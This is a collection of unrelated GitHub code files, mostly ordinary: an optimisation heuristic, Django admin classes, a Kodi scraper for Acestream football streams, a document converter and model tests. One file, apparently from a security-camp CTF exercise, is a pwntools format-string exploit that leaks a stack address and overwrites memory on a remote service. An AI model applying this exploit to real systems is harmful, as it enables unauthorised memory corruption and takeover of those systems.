get_supported_languages(model['model_settings']['polyglot_model']):\n model['language'] = language\n model['training'] = 'finished'\n model['available'] = True\n # model['user'] = DEFAULT_USER[language]\n entities.append(model)\n find_entity = model.copy()\n del find_entity['description']\n find_model = mongo.default_entity.find_one(find_entity)\n if find_model is None:\n if '_id' in model:\n del model['_id']\n try:\n # model_id = mongo.default_entity.insert(model)\n mongo.default_entity.insert(model)\n except Exception:\n print(model)\n raise\n # mongo.users.update_one(\n # {'_id': DEFAULT_USER[language]},\n # {'$addToSet': {'entity': model_id}},\n # upsert=True\n # )\n return entities\n","repo_name":"dari28/RebuildPR","sub_path":"newsAPI/install/install_default_model.py","file_name":"install_default_model.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8109943999","text":"import gurobipy\n\nclass LeastStopsRemovalMIP(object):\n \"\"\"\n Assume that each stop adds to the total features linearly, and therefore\n solve a Knapsack problems to maximize the utility\n \"\"\"\n def __init__(self, dict_feat_gap, dict_stop_feat_weight,dict_stop_dual_val):\n self.dict_feat_gap = dict_feat_gap # dict[feat] = gap\n self.dict_stop_feat_weight = dict_stop_feat_weight # dict[stop_id][feat] = weight removal\n self.dict_stop_dual_val = dict_stop_dual_val # dict[stop_id] = dual value\n\n # MIP parameters\n self.modelOptim = gurobipy.Model(\"MIP for removal heuristic\")\n self.modelOptim.Params.LogToConsole = 0\n self.modelOptim.modelSense = gurobipy.GRB.MINIMIZE\n self.modelOptim.Params.LogFile = 'least_stop_mip.log'\n # self.modelOptim.Params.Method = -1\n\n self.EPSILON = 0.001\n self.bigM = 10000\n self.alpha = 10 # importance given to the reduced cost\n\n # storage\n self.var_activation_stop = {} # a dict[stop_id] = var\n self.var_violation_cst = {} # a dict[feature] = var\n\n\n def _create_var_stops(self):\n \"\"\"\n Create the stop variable, binary\n \"\"\"\n for stop_id in self.dict_stop_feat_weight:\n varname = 'act_' + stop_id\n cost = 1 + self.alpha * self.dict_stop_dual_val[stop_id]\n self.var_activation_stop[stop_id] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _create_var_violation(self):\n \"\"\"\n Create the violation variable, binary\n \"\"\"\n for feat in self.dict_feat_gap:\n varname = 'violation_' + feat\n cost = 0\n self.var_violation_cst[feat] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _cst_violation_feature(self,percentage =1):\n \"\"\"\n Ensure that the violation value only takes value one if the features constraints are actually violated.\n :param percentage: the percentage of the gap to be considered\n \"\"\"\n for feature in self.dict_feat_gap:\n cst_name = 'Violation_' + feature\n gap = percentage * self.dict_feat_gap[feature]\n\n if gap >=0:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap >=\n - (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n else:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap + self.EPSILON <=\n (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n\n\n def _cst_at_least_one_violated(self):\n \"\"\"\n Make sure that at least one of the 
constraints is violated\n \"\"\"\n cst_name = \"at_least_one_violated\"\n self.modelOptim.addConstr(sum(self.var_violation_cst[feat] for feat in self.var_violation_cst.keys()) >= 1,\n cst_name)\n\n def _cst_at_least_one_stop_selected(self):\n \"\"\"\n Make sure that at least one of the stops is selected. Which may not necessarily be the case if we have to introduce\n a gap due to initial infeasibility\n \"\"\"\n cst_name = \"at_least_one_stop\"\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] for stop_id in self.var_activation_stop.keys()) >= 1,\n cst_name)\n\n\n def _retrieve_solution(self):\n \"\"\"\n :return: a list of selected_stop\n \"\"\"\n list_stop_id = []\n for stop_id in self.var_activation_stop:\n var = self.var_activation_stop[stop_id]\n\n if abs(var.x) >= self.EPSILON:\n list_stop_id.append(stop_id)\n\n return list_stop_id\n\n\n def _deal_with_infeasible(self):\n \"\"\"\n Deal with infeasibility problem which may arise due to the limited number of stops tested\n :return the list of selected stop_id or all_stops_id\n \"\"\"\n nb_iter = 0\n while self.modelOptim.Status == gurobipy.GRB.INFEASIBLE and nb_iter < 7:\n nb_iter += 3\n # remove all constraints\n self.modelOptim.remove(self.modelOptim.getConstrs())\n self.modelOptim.update()\n\n # re -add the constraint\n self._cst_at_least_one_violated()\n percentage = (10-nb_iter)/10\n self._cst_violation_feature(percentage)\n self.modelOptim.optimize()\n\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return list(self.var_activation_stop.keys())\n else:\n return self._retrieve_solution()\n\n\n def solve(self):\n \"\"\"\n Main function, solve the knapsack problem\n :return: the list of selected stop_id\n \"\"\"\n self._create_var_stops()\n self._create_var_violation()\n self._cst_at_least_one_violated()\n self._cst_violation_feature()\n self._cst_at_least_one_stop_selected()\n\n self.modelOptim.optimize()\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return self._deal_with_infeasible()\n\n else:\n return self._retrieve_solution()\n","repo_name":"jpoulletXaccount/MIT_thesis_OR_ML","sub_path":"src/optimization_step/scp_approach/heuristics_improvement/least_stops_removal_MIP.py","file_name":"least_stops_removal_MIP.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19082712151","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _ul\n\nfrom apps.blogs.models import Category, Comment, Post, Tag\nfrom apps.generic.admin import GenericModelAdmin\n\n\n@admin.register(Tag)\nclass TagAdmin(GenericModelAdmin):\n pass\n\n\n@admin.register(Category)\nclass CategoryAdmin(GenericModelAdmin):\n list_display = (\n 'name',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'categorytype'\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'name',\n 'description',\n 'categorytype',\n 'image_class',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n )\n search_fields = ('name', 'description',)\n\n\n@admin.register(Post)\nclass PostAdmin(GenericModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'author',\n 'rate',\n 'view_count',\n 'num_comments',\n 'publication_date',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'category',\n )\n 
fieldsets = (\n (None, {\n 'fields': (\n 'author',\n 'category',\n 'tags',\n 'title',\n 'picture',\n 'announcement',\n 'post',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'publication_date',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Заметки'), {\n 'fields': (\n 'notes',\n )\n }),\n )\n filter_horizontal = ('tags',)\n search_fields = ('title', 'announcement',)\n\n def formfield_for_dbfield(self, db_field, *args, **kwargs):\n formfield = super(PostAdmin, self).formfield_for_dbfield(db_field, *args, **kwargs)\n if db_field.name == 'author':\n formfield.initial = kwargs['request'].user\n if db_field.name == 'seo_author':\n formfield.initial = kwargs['request'].user.get_full_name()\n if db_field.name == 'is_published':\n formfield.initial = False\n formfield.help_text = \"\"\"\n Перед публикацией разместите статью в\n <br>\n <a href=\"https://webmaster.yandex.ru/site/service-plugin.xml?host=22600389&service=ORIGINALS&need_auth=false&new_site=false\">\n Yandex оригинальные тексты</a>\n \"\"\" # noqa\n return formfield\n\n def get_queryset(self, request):\n qs = super(PostAdmin, self).get_queryset(request)\n return qs.exclude(category__categorytype=Category.CATEGORY_QUESTIONS)\n\n class Media:\n js = (\n '/static/jquery/jquery.min.js',\n '/static/jquery/jquery.synctranslit.min.js',\n '/static/site/js/admin.js',\n )\n\n\n@admin.register(Comment)\nclass CommentAdmin(GenericModelAdmin):\n search_fields = ('comment', 'author_username', 'author__username')\n list_display = (\n 'comment',\n 'creation_date',\n 'author_username',\n 'is_published',\n 'is_spam',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_spam',\n 'is_published',\n )\n list_editable = (\n 'is_spam',\n 'is_published',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'comment',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'is_spam'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Связи'), {\n 'fields': (\n 'parent',\n 'post',\n )\n }),\n (_ul(u'Автор'), {\n 'fields': (\n 'author',\n 'author_username',\n 'ip_address',\n )\n }),\n )\n readonly_fields = ('parent', 'post', 'author', 'author_username')\n","repo_name":"animeshinvinci/obelektrike","sub_path":"apps/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32602022597","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport re\n\nimport xbmc\nfrom bs4 import BeautifulSoup\n\nimport tools\nfrom lib import lang, art\nfrom lib.cache import Cache\nfrom lib.errors import WebSiteError\n\n\nclass LiveFootbalLOL:\n\n __web_url = 'http://livefootballol.me/'\n\n def __init__(self, settings):\n self.__settings = settings\n\n def get_menu(self):\n \"\"\"\n Get the list of LiveFootbalLOL categories: agenda and competitions\n\n :return: The list of LiveFootbalLOL categories\n :rtype: list\n \"\"\"\n return [\n {\n 'name': 'Hoy y mañana',\n 'icon': tools.build_path(self.__settings['path'], 'hoy_manana.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Agenda 7 días',\n 'icon': tools.build_path(self.__settings['path'], 'siete_dias.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Competiciones',\n 'icon': 
tools.build_path(self.__settings['path'], 'competiciones.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }]\n\n def __get_competition_art(self, competition):\n return {\n 'icon': art.get_competition_icon(competition, self.__settings['path'], default='futbol.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'futbol_art.jpg')\n }\n\n @staticmethod\n def __get_event_name(event, date, time, competition):\n color = 'yellow'\n now = datetime.datetime.now()\n\n event_date = date.split('-')\n event_time = time.split(':')\n\n event_dt_start = datetime.datetime(\n int(event_date[2]),\n int(event_date[1]),\n int(event_date[0]),\n int(event_time[0]),\n int(event_time[1])\n )\n\n # noinspection PyTypeChecker\n if event_dt_start - datetime.timedelta(minutes=5) <= now <= event_dt_start + datetime.timedelta(hours=2):\n color = 'lime'\n elif now >= event_dt_start:\n color = 'orange'\n\n name = event.split('-')\n name = '%s - %s' % (name[0], name[1]) if len(name) == 2 else event\n\n return '[COLOR %s](%s %s:%s)[/COLOR] (%s) [B]%s[/B]' % \\\n (color, date[:5], event_time[0], event_time[1], lang.translate(competition), name)\n\n def __get_urls(self, page):\n agenda_url = None\n url = re.findall(r'href=[\\'\"]?([^\\'\" >]+).*title=\"Live Football Streaming\"', page, re.U)\n if url and len(url) == 1:\n agenda_url = url[0] if 'http' in url[0] else '%s%s' % (\n self.__web_url[:-1] if url[0].startswith('/') else self.__web_url, url[0])\n if agenda_url:\n return {'agenda': agenda_url}\n return None\n\n def get_all_events(self):\n \"\"\"\n Get all LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'])\n\n # Busca la URI de la agenda y los enlaces de los canales en caché\n page = cache.load(self.__web_url, False)\n if page:\n # La URI de la agenda está en caché, busca también los eventos\n events = cache.load(page['agenda'])\n if events:\n for event in events:\n event['name'] = self.__get_event_name(\n event['event'], event['date'], event['time'], event['competition'])\n return events\n\n # La URI de la agenda no está en cache\n # Vuelve a obtener la agenda y los eventos\n events = []\n\n # GET livefootballol.in\n page = tools.get_web_page(self.__web_url)\n\n # Averigua la URI de la agenda\n urls = self.__get_urls(page)\n if not urls:\n raise WebSiteError(\n u'Agenda no encontrada',\n u'Los de LiveFootbalLOL han hecho cambios en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda la URI de la agenda en caché\n cache.save(self.__web_url, urls)\n\n # GET agenda\n agenda = tools.get_web_page(urls['agenda'])\n\n # Obtiene la tabla de eventos\n a_events = re.findall(\n r'([0-9]{1,2}:[0-9]{2})\\s*<a href=[\\'\"]?(/streaming/(.*)/[0-9]{2}-[0-9]{2}-[0-9]{4}-.*)[\\'\"]>(.*)</a>',\n agenda,\n re.U)\n\n # Obtiene las ligas\n a_leagues = re.findall(\n r'<b>(.*)</b></li>\\s*<li>[0-9]{1,2}:[0-9]{2}\\s*'\n r'<a href=[\\'\"]?/streaming/(.*)/[0-9]{2}-[0-9]{2}-[0-9]{4}-.*[\\'\"]>',\n agenda,\n re.U)\n\n for a_event in a_events:\n league = self.__get_competition_name(a_event[2], a_leagues)\n competition_art = self.__get_competition_art(league)\n c_date = re.findall(r'([0-9]{2}-[0-9]{2}-[0-9]{4})-', tools.str_sanitize(a_event[1]), re.U)\n if c_date:\n events.append(\n {\n 'date': c_date[0],\n 'time': tools.str_sanitize(a_event[0]),\n 'competition': tools.str_sanitize(league),\n 'event': tools.str_sanitize(a_event[3]),\n 'channel_url': a_event[1],\n 'name': self.__get_event_name(\n 
tools.str_sanitize(a_event[3]),\n c_date[0],\n tools.str_sanitize(a_event[0]),\n tools.str_sanitize(league)),\n 'icon': competition_art['icon'],\n 'fanart': competition_art['fanart']\n }\n )\n\n if len(events) == 0:\n raise WebSiteError(\n u'Problema en la agenda',\n u'Está vacía o no hay enlaces, puedes comprobarlo en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(urls['agenda'], events)\n\n return events\n\n @staticmethod\n def __get_competition_name(event, leagues):\n for league in leagues:\n if event == league[1]:\n return league[0]\n return 'Futbol'\n\n def get_events_today_and_tomorrow(self):\n \"\"\"\n Get today and tomorrow LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n today_tomorrow = []\n today = datetime.datetime.now()\n events = self.get_all_events()\n\n for event in events:\n try:\n if int(event['date'][:2]) == int(today.strftime('%d')) or \\\n int(event['date'][:2]) == int((today + datetime.timedelta(days=1)).strftime('%d')):\n today_tomorrow.append(event)\n except ValueError:\n tools.write_log(\"Fecha '%s' de '%s' incorrecta\" % (event['date'], event['name']), xbmc.LOGERROR)\n\n return today_tomorrow\n\n def get_events_by_competition(self, competition):\n \"\"\"\n Get LiveFootbalLOL events by a given competition\n\n :param competition: The competition name\n :type: competition: str\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n competitions = []\n events = self.get_all_events()\n\n for event in events:\n if event['competition'] == competition:\n competitions.append(event)\n\n return competitions\n\n def get_competitions(self):\n competition_events = []\n competitions = []\n competitions_list = []\n events = self.get_all_events()\n\n # Lista de competiciones en la guía\n for event in events:\n if not event['competition'] in competitions:\n competitions.append(event['competition'])\n\n # Construye la lista competiciones: añade al título el número de eventos que contiene\n for competition in competitions:\n competition_events[:] = []\n competition_art = self.__get_competition_art(competition)\n for event in events:\n if event['competition'] == competition:\n competition_events.append(competition)\n competitions_list.append({\n 'name': '[B]%s[/B] (%i)' % (lang.translate(competition), len(competition_events)),\n 'competition_id': competition,\n 'icon': competition_art['icon'],\n 'fanart': competition_art['fanart']\n })\n\n return competitions_list\n\n def get_channels(self, event_url):\n \"\"\"\n Get LiveFootbalLOL channels by a given event URL\n\n :param event_url: The event URL\n :type: event_url: str\n :return: The list of LiveFootbalLOL event links\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'], minutes=10)\n\n # Monta la URL del evento\n e_url = '%s%s' % (self.__web_url[:-1] if event_url.startswith('/') else self.__web_url, event_url)\n\n # Busca los canales del evento en caché\n channels = cache.load(e_url, True)\n if channels:\n return channels\n\n # Los datos de los canales no están en cache\n # Vuelve a obtenerlos\n channels = []\n\n # GET e_url\n page = tools.get_web_page(e_url)\n\n # Busca la jornada\n # match_week = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s[Ww][Ee]{2}[Kk]</td>\\s*<td>([0-9]+)</td>', page, re.U)\n\n # Obtiene la tabla de datos de los canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table uk-table-hover uk-table-striped'})\n\n # Obtiene los datos de los canales\n 
prev_lang = None\n for row in table.findAll(\"tr\")[2:]:\n cells = row.findAll(\"td\")\n\n # Obtiene los datos generales del canal\n ch_name = tools.str_sanitize(cells[1].get_text())\n ch_lang = tools.str_sanitize(cells[0].get_text())\n\n # ¿Hay ya enlaces?\n if 'will be here' in ch_name:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]</td>\\s*<td><strong>(.*)</strong></td>', page, re.U)\n if len(channels) > 0:\n break\n else:\n raise WebSiteError(\n match[0] if match else u'LiveFootbalLOL',\n u'Todavía no se han publicado los enlaces del partido',\n time=self.__settings['notify_secs']\n )\n\n # Si no es un enlace acestream continua\n ch_link = tools.str_sanitize(cells[1].find('a').get('href'))\n if not ch_link or 'acestream' not in ch_name.lower():\n continue\n\n # Obtiene el idioma\n if not ch_lang or not re.findall(r'(\\[[A-Z]{2}\\])', ch_lang, re.U):\n ch_lang = prev_lang if prev_lang else '[--]'\n prev_lang = ch_lang if ch_lang else '[--]'\n\n # Obtiene los datos extendidos y los hashlinks del canal\n channel_data = self.__get_channel_data(cache, ch_link)\n if channel_data:\n for link in channel_data['links']:\n channels.append(\n {\n 'name': self.__get_channel_name(\n channel_data['name'],\n channel_data['bitrate'],\n link['hd'],\n ch_lang),\n 'icon': art.get_channel_icon(channel_data['name'], self.__settings['path']),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg'),\n 'hash': link['hash']\n }\n )\n\n if len(channels) == 0:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]</td>\\s*<td><strong>(.*)</strong></td>', page, re.U)\n raise WebSiteError(\n u'%s' % (match[0]) if match else u'LiveFootbalLOL.me',\n u'Hay enlaces del partido pero no son de acestream. Inténtalo más tarde...',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(e_url, channels)\n\n return channels\n\n @staticmethod\n def __get_channel_data(cache, url):\n \"\"\"\n Get channel data for an URL\n\n :param url: The channel URL\n :type: url: str\n :return: The Acestream channel data\n :rtype: dict\n \"\"\"\n # Busca los datos del canal en caché\n channel_data = cache.load(url, True)\n if channel_data:\n return channel_data\n\n # Los datos del canal no están en cache\n # Vuelve a obtenerlos\n\n # GET url\n page = tools.get_web_page(url)\n\n # Obtiene la tabla de canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table'})\n\n # Datos del canal\n ch_name = ''\n ch_sign = ''\n ch_rate = ''\n ch_links = []\n\n # Obtiene los datos del canal\n for row in table.findAll(\"tr\"):\n cells = row.findAll(\"td\")\n cell_0 = tools.str_sanitize(cells[0].get_text())\n if len(cells) == 2:\n if 'Name' in cell_0:\n ch_name = tools.str_sanitize(cells[1].get_text())\n elif 'Bitrate' in cell_0:\n ch_rate = tools.str_sanitize(cells[1].get_text())\n elif 'Signal' in cell_0:\n ch_sign = tools.str_sanitize(cells[1].get_text())\n elif 'acestream://' in cell_0:\n hashes = re.findall(\n r'[acestrm:/]*([0-9a-f]{40})', tools.str_sanitize(cells[0].find('a').get('href')), re.U)\n if hashes:\n ch_links.append({\n 'hash': hashes[0],\n 'hd': '(HD)' in cell_0\n })\n\n if len(ch_links) == 0:\n return None\n\n channel_data = {\n 'name': ch_name,\n 'bitrate': ch_rate,\n 'signal': ch_sign,\n 'links': ch_links\n }\n\n # Guarda los datos del canal en caché\n cache.save(url, channel_data)\n return channel_data\n\n @staticmethod\n def __get_channel_name(name, bitrate, is_hd, lang_code):\n color = 'yellow'\n\n kbps = bitrate.split(' ')[0]\n\n if not kbps.isdigit():\n 
color = 'silver'\n elif int(kbps) >= 2000:\n color = 'lime'\n elif int(kbps) < 1000:\n color = 'red'\n\n return '%s %s [COLOR %s]%s(%s)[/COLOR]' % (name, lang_code, color, '[B](HD)[/B] ' if is_hd else '', bitrate)\n","repo_name":"Makintos/plugin.video.acestream.sports","sub_path":"lib/livefootballol.py","file_name":"livefootballol.py","file_ext":"py","file_size_in_byte":14963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18472402260","text":"from pwn import *\ncontext.log_level = 'DEBUG'\n\ndef p64(n):\n return pack(n, 64, 'little')\n\n# p = process('./secret')\n# gdb.attach(p, gdbscript=('b *0x0000000000400801\\n'))\np = remote('140.110.112.221', 6131)\npayload = b'%10$p' # leak_stack_address\np.recvuntil(b':')\n# buffer locate on offset 8\np.sendline(payload)\nstack_address = int(p.recvuntil(b'\\n').strip(b'\\n').split(b' ')[3].decode(),16)\nstack_address = stack_address - 0x100 + 12\nprint(hex(stack_address))\np.recvuntil(b')')\n# p.sendline(b'N')\n# p.recvuntil(b':')\npayload = b'%%55c%10$hhn' + b'B'*5 + p64(stack_address) # modify stack value b'%55c%10$hhn' + b'B'*5\np.sendline(payload)\n#p.recvuntil(b')')\np.interactive()\n","repo_name":"Stanley137/CyberSecurity_Camp","sub_path":"mythirdpwn_ctf/secret_poc.py","file_name":"secret_poc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22910229755","text":"import xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\nfrom docx import Document\nimport datetime\nimport string\nimport requests\nimport pathlib\nimport shutil\nfrom docx.shared import Inches\n\nclass MyHTMLParser(HTMLParser):\n \n def __init__(self, _lastTitle, _lastDate):\n self.doc = Document()\n self.doc.add_heading(_lastTitle, 0)\n self.doc.add_heading(_lastDate, level=1)\n self.imageCounter = 0\n self.imageStack = []\n self.treeStack = []\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n print(f\"Encountered a start tag:{tag} , {attrs}\")\n if (tag == 'img'):\n for attr in attrs:\n if attr[0] == 'src':\n print(attr[1])\n self.imageCounter = self.imageCounter + 1\n extention = pathlib.Path(attr[1]).suffix\n fileName = './exports/' + str(self.imageCounter) + extention\n print(fileName)\n url = attr[1]\n response = requests.get(url, stream=True)\n with open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n #with open(fileName, 'wb') as f:\n # f.write(requests.get(attr[1]).content)\n self.imageStack.append(fileName)\n self.treeStack.append(tag)\n pass\n\n def handle_endtag(self, tag):\n print(\"Encountered an end tag :\", tag)\n tagtype = self.treeStack.pop()\n pass\n\n def handle_data(self, data):\n strippedString = data.translate(str.maketrans('', '', string.whitespace))\n print(f\"Encountered some data :{len(data)}{len(strippedString)}{data}\")\n if (len(strippedString) > 0):\n if (len(self.treeStack)>0):\n tagtype = self.treeStack[len(self.treeStack)-1]\n if (tagtype == 'p'):\n if (len(self.treeStack) > 1):\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if innertagtype == 'blockquote':\n textToWrite = '\\\"' + data + '\\\"'\n self.doc.add_paragraph(textToWrite)\n else:\n self.doc.add_paragraph(data)\n if (tagtype == 'h1'):\n self.doc.add_heading(data, level=1)\n if (tagtype == 'h2'):\n self.doc.add_heading(data, level=2)\n if (tagtype == 'h3'):\n self.doc.add_heading(data, level=3)\n if (tagtype == 'div'):\n 
#self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'figure'):\n self.doc.add_paragraph(data)\n if (tagtype == 'a'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'p'):\n self.doc.add_paragraph(data)\n if (tagtype == 'li'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'ul'):\n self.doc.add_paragraph(data, style='List Bullet')\n if (tagtype == 'img'):\n fileName = self.imageStack[len(self.treeStack)-1]\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n else:\n self.doc.add_paragraph(data)\n else:\n if (len(self.imageStack)>0):\n fileName = self.imageStack.pop()\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n \n def write_document(self, title):\n self.doc.save('./exports/'+title+'.docx')\n\ntree = ET.parse('researchandideasdiary.WordPress.2019-07-15.xml')\nroot = tree.getroot()\nprint(root.tag)\nprint(root.items())\nchannel = root.getchildren()[0]\nlistOfTags = []\nfor child in channel.getchildren():\n print(child.tag, child.attrib)\n if child.tag == 'item':\n lastTitle = ''\n lastDate = ''\n lastGuid = ''\n for postdata in child.getchildren():\n listOfTags.append(postdata.tag)\n if (postdata.tag == 'title'):\n print(postdata.text)\n lastTitle = postdata.text\n if (postdata.tag == 'pubDate'):\n print(postdata.text)\n lastDate = postdata.text\n if (postdata.tag == 'guid'):\n print(postdata.text)\n lastGuid = postdata.text\n if postdata.tag == '{http://purl.org/rss/1.0/modules/content/}encoded':\n datestring = 'draft'\n if (lastDate != 'Mon, 30 Nov -0001 00:00:00 +0000'):\n date_time_obj = datetime.datetime.strptime(lastDate, '%a, %d %b %Y %H:%M:%S %z')\n datestring = str(date_time_obj.date())\n print(datestring)\n parser = MyHTMLParser(lastTitle, datestring)\n parser.feed(str(postdata.text))\n parser.write_document('Exp'+datestring+lastTitle)\n\nlistOfUniqueTags = list(set(listOfTags))\nfor tag in listOfUniqueTags:\n print(tag)\n\n ","repo_name":"JapieGreeff/WordPressToDocx","sub_path":"wordpressInDocxOut.py","file_name":"wordpressInDocxOut.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70121702408","text":"# -*- coding: utf-8 -*-\r\n'''\r\n1. 
В диапазоне натуральных чисел от 2 до 99 определить, сколько из них кратны\r\nкаждому из чисел в диапазоне от 2 до 9.\r\n'''\r\n\r\nstart_range = 2\r\nend_range = 100\r\n\r\nmultiples_min = 2\r\nmultiples_max = 9 + 1\r\n\r\nfor i in range(multiples_min, multiples_max):\r\n count = 0\r\n for itm in range(start_range, end_range):\r\n if (itm % i) == 0:\r\n count += 1\r\n print(f'Числу {i} в диапазоне от {start_range} до {end_range-1} кратны {count} чисел')","repo_name":"darksoul985/Algorithms","sub_path":"lesson_3_task_1.py","file_name":"lesson_3_task_1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22865427718","text":"import os.path as osp\nimport unittest\n\nimport cv2\n\nfrom modelscope.hub.snapshot_download import snapshot_download\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.pipelines.base import Pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.test_utils import test_level\n\n\nclass SkinRetouchingTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.skin_retouching\n self.model_id = 'damo/cv_unet_skin-retouching'\n self.test_image = 'data/test/images/skin_retouching.png'\n\n def pipeline_inference(self, pipeline: Pipeline, input_location: str):\n result = pipeline(input_location)\n cv2.imwrite('result_skinretouching.png', result[OutputKeys.OUTPUT_IMG])\n print(f'Output written to {osp.abspath(\"result_skinretouching.png\")}')\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_by_direct_model_download(self):\n model_dir = snapshot_download(self.model_id)\n skin_retouching = pipeline(Tasks.skin_retouching, model=model_dir)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_run_modelhub(self):\n skin_retouching = pipeline(Tasks.skin_retouching, model=self.model_id)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_modelhub_default_model(self):\n skin_retouching = pipeline(Tasks.skin_retouching)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_skin_retouching.py","file_name":"test_skin_retouching.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"73386389129","text":"import cv2\nimport os\nimport re\nimport tempfile\nimport numpy as np\nfrom datetime import date\nfrom PIL import Image\nimport boto3\nimport json\n\nfrom dotenv import load_dotenv, find_dotenv\n\n_ = load_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n\ndef get_video(awssession, today):\n # Download from s3\n s3 = awssession.resource('s3')\n s3_client = awssession.client('s3')\n\n filenames = [\n my_bucket_object.key\n for my_bucket_object in s3.Bucket('bageld-inputs').objects.all()\n ]\n\n videoFile = list(filter(lambda x: today in x, filenames))[0]\n\n player_name = videoFile.split(';')[1].replace('_', ' ')\n tour = videoFile.split(';')[2]\n s3_client.download_file('bageld-inputs', 